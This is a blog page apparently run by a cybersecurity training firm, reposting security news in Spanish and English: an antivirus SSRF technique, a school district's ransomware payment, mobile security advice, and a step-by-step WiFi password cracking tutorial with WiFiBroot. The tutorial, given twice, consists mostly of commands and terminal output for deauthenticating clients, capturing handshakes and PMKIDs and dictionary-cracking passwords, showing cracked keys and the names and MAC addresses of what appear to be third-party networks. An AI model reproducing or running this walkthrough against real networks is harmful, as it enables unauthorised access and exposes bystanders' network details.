This is default featured slide 1 title

International Institute Cyber Security Mexico provides training for all type of data security.

This is default featured slide 2 title

Webiprints is one of the world famoous company for data security provider in world wide at lowest price with 100% secure.

This is default featured slide 3 title

Webiprints offers Mobile application development services at affordable price and also Mobile Hacking Course. Just visit our website and fill up your query.

This is default featured slide 4 title

Grow your business with us! We offers Digital Marketing including services such as SEO, SMO and PPC.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Friday 30 August 2019

NUEVA TÉCNICA DE HACKING PARA EXPLOTAR ANTIVIRUS Y EXTRAER DATOS DE SERVIDORES

CONTENIDO ORIGINAL: https://noticiasseguridad.com/seguridad-informatica/nueva-tecnica-de-hacking-para-explotar-antivirus-y-extraer-datos-de-servidores/

El equipo de expertos en seguridad de aplicaciones web de TokyoWesterns acaba de revelar un nuevo método de ataque que, de ser explotado, permitiría la extracción de información confidencial de cualquier servidor protegido con Windows Defender.

Este método de ataque, apodado “AV Oracle”, fue revelado durante un reciente evento de ciberseguridad y, según sus desarrolladores, se trata de una técnica especializada de falsificación de solicitudes en el lado del servidor que aprovecha los mecanismos de seguridad incluidos en Windows Defender por defecto. Windows Defender es la herramienta de seguridad antivirus preinstalada en los sistemas de Microsoft.

Esta clase de ataques (comúnmente conocidos como ataques SSRF) dependen del envío de paquetes de solicitudes especialmente diseñados para engañar a los servidores y obtener como respuesta información confidencial, inaccesible de otro modo para los actores de amenazas, aseguran los especialistas en seguridad de aplicaciones web.

Usualmente, los hackers recurren al uso de ataques SSRF para acceder a ciertos recursos, como archivos confidenciales y otros recursos, a los que sólo se puede acceder a través de una red local del servidor objetivo. En el método desarrollado por los investigadores se muestra un ataque contra una aplicación web ejecutada en un servidor protegido con Windows Defender.

La aplicación objetivo contenía algunas URL disponibles públicamente (cualquier usuario podría acceder a ellas), además de una URL accesible solamente para los administradores usando la dirección local “localhost” (en el mismo servidor); según los expertos, esta URL contenía la información confidencial del objetivo.

Posteriormente, los expertos en seguridad de aplicaciones web crearon un fragmento de código JavaScript especialmente diseñado para incrustarlo en la cadena de consulta de una de las URL disponibles públicamente. Esto provoca que algunas características de protección en Windows Defender analicen el fragmento de código buscando comandos maliciosos. Este análisis afecta las respuestas del servidor al cliente, por lo que un hacker podría hacer que Windows Defender filtre información confidencial almacenada en la aplicación web objetivo manipulando su script cuidadosamente.

Además, esta vulnerabilidad también podría ser clasificada como un exploit de la categoría XS-Search. En otras palabras, esta falla hace que el software antivirus pierda un valor secreto al almacenar un archivo que contiene un valor controlado por el atacante e información confidencial.

Acorde a especialistas en seguridad de aplicaciones web del Instituto Internacional de Seguridad Cibernética (IICS) Windows Defender comenzaría a filtrar de forma involuntaria múltiples detalles sobre el sistema atacado a los atacantes. Al ser consultado acerca de esta falla, uno de los miembros del equipo que realizó esta investigación aseguró que este método de ataque podría ser funcional en otras soluciones de protección de endpoint, destacando este escenario requeriría que el antivirus atacado cuente con un componente para analizar código JavaScript, al igual que Windows Defender.

Por otra parte, al ser cuestionado acerca del potencial dañino del ataque AV Oracle en otros escenarios o contra otros objetivos, el especialista mencionó que la investigación aún no concluye, por lo que nuevas formas de explotar estas fallas podrían aparecer en breve, aunque sí menciona un potencial escenario: “Puede que este ataque también funcione contra la memoria caché de un navegador, por lo que AV Oracle afectaría a los servidores y a los usuarios”, advierte el experto.


NEW HACKING TECHNIQUE TO EXPLOIT ANTIVIRUS AND EXTRACT DATA FROM SERVERS

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/08/27/new-hacking-technique-to-exploit-antivirus-and-extract-data-from-servers/

TokyoWesterns’ team of web application security experts just unveiled a new attack method that, if exploited, would allow the extraction of sensitive information from any server protected with Windows Defender.

This attack method, dubbed “Oracle AV”, was disclosed during a recent cybersecurity event and, according to its developers, is a specialized server-side request forgery technique that leverages security mechanisms included in Windows Defender by default. Windows Defender is the antivirus security tool pre-installed on Microsoft systems.

These kinds of attacks (commonly known as SSRF attacks) rely on sending specially designed request packages to trick servers into responding with sensitive information, otherwise inaccessible for threat actors, as assured by web application security specialists.

Hackers usually use SSRF attacks to access certain resources, such as sensitive files and other resources that can only be accessed through a local network of the target server. The method developed by the researchers shows an attack against a web application running on a Windows Defender-protected server.

The target application contained some publicly available URLs (any user could access them), plus a URL accessible only to administrators using the local address “localhost” (on the same server); according to the experts, this URL contained the target’s confidential information.

Subsequently, web application security experts created a specially crafted JavaScript snippet to embed it in the query string of one of the publicly available URLs. This causes some protection features in Windows Defender to scan the snippet for malicious commands. This analysis affects responses from the server to the client, so a hacker could have Windows Defender filter sensitive information stored in the target web application by manipulating its script carefully.

In addition, this vulnerability could also be classified as an exploit of the XS-Search category. In other words, this flaw causes antivirus software to lose a secret value by storing a file that contains attacker-controlled value and sensitive information.

According to web application security specialists from the International Cyber Security Institute (IICS) Windows Defender would start unintentionally filtering multiple details about the attacked system of attackers. When asked about this flaw, one of the team members who conducted this research ensured that this attack method could be functional in other endpoint protection solutions, highlighting this scenario would require that the attacked antivirus have a component to analyze JavaScript code, just like Windows Defender.

Moreover, when questioned about the harmful potential of Oracle AV attack in other scenarios or against other targets, the specialist mentioned that the investigation is not yet completed, so new ways to exploit these flaws could appear shortly, although it does mention a potential scenario: “This attack may also work against a browser’s cache, so Oracle AV would affect servers and users,” warns the expert.


NEW YORK GOVERNMENT PAID $88K USD DUE TO RANSOMWARE ATTACK DESPITE HAVING FIREWALL AND ANTIVIRUS SOLUTIONS

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/08/27/new-york-government-paid-88k-usd-due-to-ransomware-attack-despite-having-firewall-and-antivirus-solutions/

Even though the complex cybersecurity solutions currently available on the market, a system, network, or computer will never be 100% protected against security threats. Cybersecurity services experts report an incident in New York City that compromised the security of a school district despite having antivirus and firewall solutions.

It is an infection of the dangerous Ryuk ransomware, which has compromised the systems of the Rockville Center School District in New York; due to the infection, the local government had to pay almost $90k USD to hackers to regain access to the files encrypted by the malware.

The incident occurred on June 25, according to a report published by the specialized platform SC Media. Although the administrators implemented the best available security measures, the ransomware operators managed to complete the infection and eventually district security services personnel were forced to close all computers on the network to prevent the spread of ransomware.

“We detected the encryption process at a relatively early stage, so our insurance company was able to arrange payment of less than what was initially intended by the attackers, so it only corresponds to the New York government a $10K USD payment of deductible,” school district officials said. SC Media’s report holds that the initial ransom amount was over $170k USD.

On their decision to pay the ransom, the authorities stated, “We exhausted all our efforts trying to regain access to the information on our own. However, after analyzing the consequences that the permanent loss of this data could generate, we decided to pay the ransom to keep up the district’s operations.”

According to cybersecurity services experts, the Rockville Center School District is not the only one that has been the victim of cyberattacks in recent times. Several reports indicate that a series of malicious campaigns have been deployed for at least the past six months against the entire New York Department of Education, which has sent safety warnings to all school districts in the state, trying to prevent future security incidents.

While specialists strongly recommend not paying the ransoms demanded by hackers in these cases, it is increasingly common for affected companies to try to negotiate with the attackers; even some cybersecurity insurance policies have been updated, including coverage against ransomware attacks.

International Institute of Cyber Security (IICS) cybersecurity services specialists have reported similar incidents recently. Among the most prominent cases are ransomware infections in multiple cities and counties in the state of Florida and at least two school districts in northern Louisiana. In these cases, the affected organizations have also decided to yield to the demands of the threat actors and pay the ransom to recover their information.  It is necessary to remember that this is not the most advisable, as there is no guarantee that the attackers will comply with their part of the deal and restore the compromised accesses once the required money is given to them.


Thursday 29 August 2019

Wednesday 28 August 2019

Tuesday 27 August 2019

Monday 26 August 2019

Sunday 25 August 2019

Thursday 22 August 2019

CÓMO PREVENIR LOS RIESGOS DE SEGURIDAD DE DISPOSITIVOS MÓVILES

CONTENIDO ORIGINAL: https://noticiasseguridad.com/seguridad-informatica/como-prevenir-los-riesgos-de-seguridad-de-dispositivos-moviles/

En la actualidad, el número de usuarios de dispositivos móviles inteligentes, especialmente smartphones, ha sobrepasado por mucho a los usuarios de equipos de cómputo de escritorio, pues estos dispositivos son más prácticos y pueden conectarse a Internet desde casi cualquier lugar. Todos usamos smartphones para diversas actividades cotidianas, ya sea por ocio o como parte de nuestras labores profesionales y otras responsabilidades.

Al igual que otros dispositivos capaces de procesar información, los smartphones pueden ser atacados buscando y explotando las vulnerabilidades de seguridad presentes en sus sistemas y herramientas de comunicación.

Una reciente investigación publicada por empresas de VPN menciona que los hackers tienen tres motivaciones principales para atacar a los usuarios de smartphones:

  • Datos: En esta categoría podemos considerar información como credenciales de inicio de sesión, listas de contactos, datos de autenticación multifactor, detalles de tarjetas de pago, entre otros.
  • Identidad: El smartphone es un dispositivo de uso personal, por lo que forzosamente almacena grandes cantidades de información relativas a los hábitos, intereses y actividades de su propietario.
  • Disponibilidad: Parte del proceso de hacking de un smartphone es limitar o restringir por completo el acceso al dispositivo del propietario

Riesgos de seguridad por el uso de apps

Uno de los principales riesgos de seguridad en un smartphone es el uso de aplicaciones maliciosas, principalmente las apps disponibles en plataformas no oficiales, ya que en muchas ocasiones estas apps contienen vulnerabilidades de seguridad por errores básicos o incluso son capaces de realizar actividades maliciosas intencionalmente en el equipo del usuario. En este caso, los principales escenarios de riesgo son:

  • Infecciones de malware: Algunas aplicaciones maliciosas podrían ejecutar cambios en el sistema operativo de su smartphone para extraer información confidencial, acceder a los archivos privados y a los datos almacenados en otras aplicaciones.
  • Violaciones de privacidad: Algunas apps no fueron diseñadas con propósitos maliciosos, no obstante, su deficiente diseño permite que la información almacenada en estos dispositivos se exponga al alcance de cualquiera.
  • Vulnerabilidades: En un caso similar al anterior, algunas aplicaciones tienen errores de código que pueden ser explotados con fines maliciosos, aunque esa no sea la intención de los desarrolladores

Riesgos de seguridad en el uso de Internet

Es necesaria una conexión a Internet para aprovechar al máximo las características de un smartphone, no obstante, del mismo modo que sucede con los equipos de escritorio, la navegación en Internet puede ser riesgosa para nuestros dispositivos. La mejor forma de evitar estas acciones malintencionadas es usar VPN, en el mercado tenemos varias buenas empresas como NordVPN. También es importante no autorizar descargas de archivos no deseados e ignorar enlaces de apariencia sospechosa recibidos por email o a través de nuestras redes sociales.

Amenazas basadas en las redes

Casi cualquier persona en el mundo tiene un smartphone, por lo que el uso de redes de transmisión de datos ha incrementado de forma considerable. Asimismo, expertos en ciberseguridad mencionan que también ha incrementado el interés de los hackers por obtener los datos confidenciales transmitidos vía WiFi y otras redes inalámbricas.

En este caso, técnicas como la explotación de fallas y espionaje en estas redes son recurrentes entre los usuarios maliciosos. Los hackers se aprovechan de las deficiencias de seguridad para capturar el tráfico de una red y obtener información confidencial. Para prevenir estos ataques, los expertos en ciberseguridad recomiendan usar sólo conexiones seguras de VPNy, de ser posible, nunca usar redes WiFi públicas, pues son empleadas por muchas personas y sus medidas de seguridad suelen ser deficientes.

Empresas de VPN aseguran que los riesgos de seguridad crecen cada día más, por lo que es vital que los usuarios aprendan a prevenir estas amenazas antes de experimentarlas personalmente. Afortunadamente no estamos solos, pues existen múltiples herramientas para ayudarnos a proteger nuestros smartphones, como red privada virtual (RPV), en inglés: Virtual Private Network (VPN), administradores de contraseñas, antivirus para móviles, entre otras.


Wednesday 21 August 2019

CRACK ANY WIFI PASSWORD WITH WIFIBROOT

ORIGINAL CONTENT: https://www.securitynewspaper.com/2019/08/12/crack-any-wifi-password-with-wifibroot/

There are many tools used to crack Wifi access points. Most of the Wifi authentication uses WPA/ WPA2 encryption to secure the Wifi networks. Still cracking password with WPA2 is mostly usable. According to ethical hacking researcher of international institute of cyber security still mostly users prefer to use WPA2 authentication for the Access Point security. We will show you to crack WPA/ WPA2 encryption with four way handshake & PMKID attack.

4-WAY HANDSHAKE :-

Four-way handshake is created so wireless client & access point can independently know PSK. Instead of telling the keys to each other they can transfer message in encryption from to each other. Four-way handshake is critical for protecting the PSK from infected access points. The four-way handshake is used to generate Pairwise Transient Key PTK keys.

PMKID :-

PMKID is an unique identification used by Access Point to track down PMK which is being used for client. using this method attacker will directly communicate with the vulnerable access point, rather than capturing communication between Access point and clients.

Earlier also ethical hacking researcher of International institute of cyber security has demonstrated hack any wireless network.

CONFIGURE YOUR WIRELESS INTERFACE :-

  • For configuring Wireless interface. Connect your Wireless interface with Linux. Open terminal type iwconfig to check if the wireless interface is connected. Type airmon-ng check wlan0
  • Type airmon-ng start wlano
  • Type iwconfig to check if the wireless interface has started in monitor mode.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# iwconfig
 eth0      no wireless extensions.
 lo        no wireless extensions.
 wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=20 dBm
           Retry short limit:7   RTS thr:off   Fragment thr:off
           Power Management:off

DOWNLOADING & INSTALLATION OF WIFIBROOT :-

  • We will show how to crack four way handshake. For testing we will use Kali Linux 2019.1 amd64.
  • Make sure python3 is installed. For that type sudo apt-get update && sudo apt-get install python3 Then type sudo apt-get install python3-pip
  • Open terminal type git clone https://github.com/hash3liZer/WiFiBroot.git
  • Type cd WiFiBroot && ls
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/hash3liZer/WiFiBroot.git
 Cloning into 'WiFiBroot'…
 remote: Enumerating objects: 3, done.
 remote: Counting objects: 100% (3/3), done.
 remote: Compressing objects: 100% (3/3), done.
 remote: Total 276 (delta 0), reused 1 (delta 0), pack-reused 273
 Receiving objects: 100% (276/276), 504.20 KiB | 347.00 KiB/s, done.
 Resolving deltas: 100% (166/166), done.
 root@kali:/home/iicybersecurity/Downloads# cd WiFiBroot/
 root@kali:/home/iicybersecurity/Downloads/WiFiBroot# ls
 dicts          handshakes  pull.py    screen.py  wifibroot.py
 exceptions.py  LICENSE     README.md  utils      wireless
  • Type python wifibroot.py
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py
 Traceback (most recent call last):
   File "wifibroot.py", line 19, in 
     from wireless import Shifter
   File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/init.py", line 3, in 
     from wireless.cracker import PSK
   File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/cracker.py", line 6, in 
     from pbkdf2 import PBKDF2
 ImportError: No module named pbkdf2
  • If the above error encounters, type pip install pbkdf2
  • Then type python wifibroot.py
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py -h
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.
Syntax:
     $ python wifibroot.py [--mode [modes]] [--options]
     $ python wifibroot.py --mode 2 -i wlan1mon --verbose -d /path/to/list -w pmkid.txt
 Modes:
     #     Description                                 Value
     01    Capture 4-way handshake and crack MIC code    1
     02    Captures and Crack PMKID (PMKID Attack)       2
     03    Perform Manaul cracking on available
           capture types. See --list-types               3
     04    Deauthentication. Disconnect two stations
           and jam the traffic.                          4
 Use -h, --help after -m, --mode to get help on modes.

CAPTURE & CRACK FOUR-WAY HANDSHAKE :-

  • Type python wifibroot.py –mode 1 –type handshake -i wlan0mon –verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt
  • –mode 1 is used to crack four way handshake
  • -i wlan0mon is the wifi adapter used in cracking Wifi networks. For cracking we are using TP-Link TL – WN722N V1
  • –verbose is used to print hash values.
  • -d is used for dictionary path. For testing we are using Wifibroot inbuilt dictionary. You can use any wordlist or crunch for cracking Wifi Passwords.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py --mode 1 --type handshake -i wlan0mon --verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.
[*] Path: {/home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt} Lines {42}
[~] Channel Specified: NONE Hopper Status [Running]
[^] Scanning! Press [CTRL+C] to stop.

  NO  ESSID           PWR  ENC    CIPHER    AUTH      CH  BSSID              VENDOR      CL
----  ------------  -----  -----  --------  ------  ----  -----------------  --------  ----
   1  HATHWAY         -38  WPA2   CCMP      PSK       10  8C:E1:17:8D:5C:E4  zte          2
   2  ZTE-ae1e0e      -40  WPA2   CCMP      PSK        1  88:5D:FB:AE:1E:0E  zte          0
   3  MTNL_HOTSPOT    -78  WPA2   TKIP      PSK       11  0C:D2:B5:2C:55:5D  Binatone     1
   4  Neon`Sunny      -87  WPA2   TKIP      PSK        1  34:E3:80:41:F8:68  Genexis      0
   5  TP-LINK_D9D6    -87  WPA2   CCMP      PSK        1  98:DE:D0:A7:D9:D6  TP-LINK      0


  • Press Ctrl + C for stopping the scan. Here our target is MTNL_HOTSPOT
  • Enter 3 for cracking MTNL_HOTSPOT
 [] Changing Channel to 11 [SuccessFul] 
  • Enter n
[?] AP Clients [1] Scan Further?[Y/n] n 
[] Time Interval [15] -> Implies Gap b/w Frames is 15
  • Then it send de-authentication to the connected clients. Below shows one devices is connected with AP.
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] 
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] 
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication]
  • As the user will enter password in their own device. Wifibroot will capture the handshake & the password.
[+] Handshake 0CD2B52C555D (Binatone) [Captured]
[!] Handshake not saved. Use -w, --write for saving handshakes.
[^] Current Password: 29054367
[+] Found: 29054367
 [>] PMK:
 00000000:  74 0a ac 04 01 16 0c dd  73 fb 4e fa 50 17 18 7f  |t…….s.N.P…|
 00000010:  a1 c0 92 36 45 20 94 15  79 42 17 bb e2 21 5d 42  |…6E…yB…!]B|
 [>] PTK:
 00000000:  95 5f ee 82 ca c3 a2 b5  b1 a1 75 4a 11 a2 d8 05  |._……..uJ….|
 00000010:  49 08 62 ec 2b b9 e6 12  13 bd f8 53 7a 0d ce a0  |I.b.+……Sz…|
 00000020:  5c 4f d1 ca 04 32 4c bb  f4 6a 27 21 83 26 b3 ad  |\O…2L..j'!.&..|
 00000030:  84 42 fb e4 49 b7 e4 e2  65 03 58 d2 30 f2 35 cb  |.B..I…e.X.0.5.|
 [>] MIC:
 00000000:  da 86 9b 74 b7 d5 aa 67  2a 7d 78 aa 30 0e df e4  |…t…g*}x.0…|
 00000010:  29 9a d2 de                                       |)…|

CAPTURE & CRACK PMKID :-

  • Type python wifibroot.py –mode 2 -i wlan0mon –verbose -d dicts/list.txt -w output.txt
  • –mode 2 is used capture & crack PMKID.
  • -i wlan0mon is the wifi adapter used in cracking Wifi networks. For cracking we are using TP-Link TL – WN722N V1
  • –verbose is used to print hash values.
  • -d is used for dictionary path. For testing we are using Wifibroot inbuilt dictionary. You can use any wordlist or crunch for cracking Wifi Passwords.
  • -w output.txt will save PMKID.
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py --mode 2 -i wlan0mon --verbose -d dicts/list.txt -w output.txt
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.

[*] Path: {dicts/list.txt} Lines {42}
[~] Channel Specified: NONE Hopper Status [Running]
[^] Scanning! Press [CTRL+C] to stop.
  • Press Ctrl + C for stopping the scan. Here our target is new_T03_T1
NO  ESSID                               PWR  ENC       CIPHER    AUTH      CH  BSSID              VENDOR      CL
 ----  --------------------------------  -----  --------  --------  ------  ----  -----------------  --------  ----
    1  Pankaj@9212458712                   -23  WPA2      CCMP      PSK        6  18:A6:F7:9B:27:DC  TP-LINK      0
    2  Cbi                                 -29  WPA2      CCMP      PSK        2  00:E0:4C:3B:37:08  REALTEK      0
    3  naidus                              -45  WPA       CCMP      PSK        2  C8:3A:35:0B:26:08  Tenda        0
    4  Lucky                               -47  WPA2      TKIP      PSK        1  54:B8:0A:07:82:D2  D-Link       0
    5  new_T03_T1                          -50  WPA2      TKIP      PSK       11  90:8D:78:F2:95:E3  D-Link       3
    6  DIRECT-28-HP DeskJet 2600 series    -59  WPA2      CCMP      PSK        6  B4:B6:86:65:DC:29  Hewlett      0
    7  Worldview@37                        -76  WPA2      CCMP      PSK        1  04:95:E6:A2:58:20  Tenda        0
    8  Sushil@WVC9312408388                -84  WPA       CCMP      PSK       11  0C:D2:B5:3D:0D:3C  Binatone     0
    9  Excitel                             -85  WPA2      CCMP      PSK        6  00:1E:A6:DB:B3:C0  Best         0
   10  Bunty                               -86  WPA2      CCMP      PSK        7  04:95:E6:87:AB:48  Tenda        0
   11  Excitel@43                          -86  WPA2/WPA  CCMP      PSK        7  C8:3A:35:46:BA:F8  Tenda        0
   12  Worldview@tanpreet                  -88  WPA2      TKIP      PSK       13  A0:AB:1B:D9:09:08  D-Link       0
  • Enter 5 for cracking new_T03_T1
[^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Open Authentication] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull]
 [^] 4 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request]
 [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull]
[] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Waiting…] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Initiated]
[^] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [1 of 4]
[~] Vulnerable to PMKID Attack!
[^] PMKID 908D78F295E3 (D-Link) [a31f70cc4ed5cabb67ae4d56f11ec0b6]
[+] PMKID -> [output.txt] [Saved]
[^] Currently Checking: accessme
[+] Password Found: accessme
[>] PMKID:
 00000000:  61 33 31 66 37 30 63 63  34 65 64 35 63 61 62 62  |a31f70cc4ed5cabb|
 00000010:  36 37 61 65 34 64 35 36  66 31 31 65 63 30 62 36  |67ae4d56f11ec0b6|
 [>] PMK:
 00000000:  93 89 96 03 d0 e8 ab bd  e8 8b f1 1b fb 8f 05 18  |…………….|
 00000010:  58 1e e3 cb 6d 2b ff 0d  b4 96 b4 fa 74 57 bd 77  |X…m+……tW.w|
  • Above shows target Access Point password.

CÓMO DESCIFRAR LA CONTRASEÑA DE CUALQUIER CONEXIÓN WIFI CON WIFIBROOT

CONTENIDO ORIGINAL: https://noticiasseguridad.com/tutoriales/como-descifrar-la-contrasena-de-cualquier-conexion-wifi-con-wifibroot/

Existen muchas herramientas para romper las contraseñas de los puntos de acceso WiFi. Actualmente, la mayoría de estas redes usan autenticación WPA/WPA2; según especialistas en hacking ético del Instituto Internacional de Seguridad Cibernética (IICS), el métido de autenticación más utilizado es el WPA2. A continuación, le mostraremos cómo romper ese método de cifrado con un handshake de 4 vías y un ataque PMKID.

Handshake de 4 vías

Se crea un protocolo de handshake de cuatro vías para que el cliente inalámbrico y el punto de acceso puedan conocer el PSK de forma independiente. En lugar de decirse las claves entre sí, pueden transferir mensajes cifrados entre sí. El handshake cuatro vías es fundamental para proteger el PSK de los puntos de acceso infectados y se usa para generar claves PTK de clave transitoria por pares.

PMKID es una identificación única utilizada por el punto de acceso para localizar el PMK usado por el cliente. Usando este método, el hacker se comunicará con el punto de acceso vulnerable directamente en lugar de capturar la comunicación entre el punto de acceso y el cliente. Anteriormente los expertos en hacking ético del IICS demostraron ser capaces de hackear cualquier conexión inalámbrica.

Configurar interfaz inalámbrica

  • Para configurar la interfaz inalámbrica, conecte su interfaz inalámbrica con Linux. Abra el terminal  y escriba iwconfig para verificar si la interfaz inalámbrica está conectada. Luego escriba airmon-ng check wlan0
  • Escriba airmon-ng start wlano
  • Escriba iwconfig para verificar si la interfaz inalámbrica se ha iniciado en modo monitor
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# iwconfig
 eth0      no wireless extensions.
 lo        no wireless extensions.
 wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=20 dBm
           Retry short limit:7   RTS thr:off   Fragment thr:off
           Power Management:off

Descargar e instalar WIFIBROOT

  • Le mostraremos cómo romper el handshake de cuatro vías. Para las pruebas usaremos Kali Linux 2019.1 amd64
  • Asegúrese de que python3 esté instalado. Para esto, teclee sudo apt-get update && sudo apt-get install python3. Luego escriba sudo apt-get install python3-pip
  • Abra el terminal y escriba git https://github.com/hash3liZer/WiFiBroot.git
  • Escriba cd WiFiBroot && ls
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/hash3liZer/WiFiBroot.git
 Cloning into 'WiFiBroot'…
 remote: Enumerating objects: 3, done.
 remote: Counting objects: 100% (3/3), done.
 remote: Compressing objects: 100% (3/3), done.
 remote: Total 276 (delta 0), reused 1 (delta 0), pack-reused 273
 Receiving objects: 100% (276/276), 504.20 KiB | 347.00 KiB/s, done.
 Resolving deltas: 100% (166/166), done.
 root@kali:/home/iicybersecurity/Downloads# cd WiFiBroot/
 root@kali:/home/iicybersecurity/Downloads/WiFiBroot# ls
 dicts          handshakes  pull.py    screen.py  wifibroot.py
 exceptions.py  LICENSE     README.md  utils      wireless
  • Escriba python wifibroot.py
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py
 Traceback (most recent call last):
   File "wifibroot.py", line 19, in 
     from wireless import Shifter
   File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/init.py", line 3, in 
     from wireless.cracker import PSK
   File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/cracker.py", line 6, in 
     from pbkdf2 import PBKDF2
 ImportError: No module named pbkdf2
  • Si se encuentra el error anterior, escriba pip install pbkdf2
  • Luego escriba python wifibroot.py
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py -h
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.
Syntax:
     $ python wifibroot.py [--mode [modes]] [--options]
     $ python wifibroot.py --mode 2 -i wlan1mon --verbose -d /path/to/list -w pmkid.txt
 Modes:
     #     Description                                 Value
     01    Capture 4-way handshake and crack MIC code    1
     02    Captures and Crack PMKID (PMKID Attack)       2
     03    Perform Manaul cracking on available
           capture types. See --list-types               3
     04    Deauthentication. Disconnect two stations
           and jam the traffic.                          4
 Use -h, --help after -m, --mode to get help on modes.

Capturar y descifrar el handshake de cuatro vías

  • Escriba python wifibroot.py –mode 1 –type handshake -i wlan0mon –verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt
  • –mode 1 se utiliza para romper el apretón de manos de cuatro vías
  • -i wlan0mon es el adaptador WiFi utilizado para descifrar redes WiFi. Para crackear estamos usando TP-Link TL – WN722N V1
  • –verbose se usa para imprimir valores hash
  • -d se usa para la ruta del diccionario. Para las pruebas estamos utilizando el diccionario incorporado Wifibroot. Puede usar cualquier lista de palabras o crisis para descifrar contraseñas WiFi
root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py --mode 1 --type handshake -i wlan0mon --verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt
 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.
[*] Path: {/home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt} Lines {42}
[~] Channel Specified: NONE Hopper Status [Running]
[^] Scanning! Press [CTRL+C] to stop.

  NO  ESSID           PWR  ENC    CIPHER    AUTH      CH  BSSID              VENDOR      CL
----  ------------  -----  -----  --------  ------  ----  -----------------  --------  ----
   1  HATHWAY         -38  WPA2   CCMP      PSK       10  8C:E1:17:8D:5C:E4  zte          2
   2  ZTE-ae1e0e      -40  WPA2   CCMP      PSK        1  88:5D:FB:AE:1E:0E  zte          0
